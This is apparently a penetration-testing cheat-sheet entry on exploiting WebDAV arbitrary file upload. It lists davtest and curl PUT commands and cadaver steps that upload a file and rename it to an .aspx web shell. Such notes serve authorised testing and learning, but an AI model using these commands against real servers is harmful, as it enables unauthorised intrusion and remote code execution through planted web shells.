WebDAV
Table of content
Arbitrary file upload
Davtest can be used to test arbitrary file upload.
davtest -url ${url}
However, sometimes false negative are sent back by the tool, and manual testing can be interesting:
# Upload the ${filename} on the ${filename_url}
curl -X PUT http://${ip}/${filename_url} -d @${filename}
# Test if the upload succeed
curl http://${ip}/${filename_url}
Finaly, cadaver is a framework than can help to work with upload and uploaded files.
# Open the cadaver shell
cadaver http://${ip}/${directory}
# It is possible to upload file with `put`, move directory with `cd` and rename files with `mv`
dav:/${directory}/> cd ..
dav:/> put shell.txt
dav:/> mv shell.txt shell.aspx
The following blog post sumary the attacks: https://null-byte.wonderhowto.com/how-to/exploit-webdav-server-get-shell-0204718/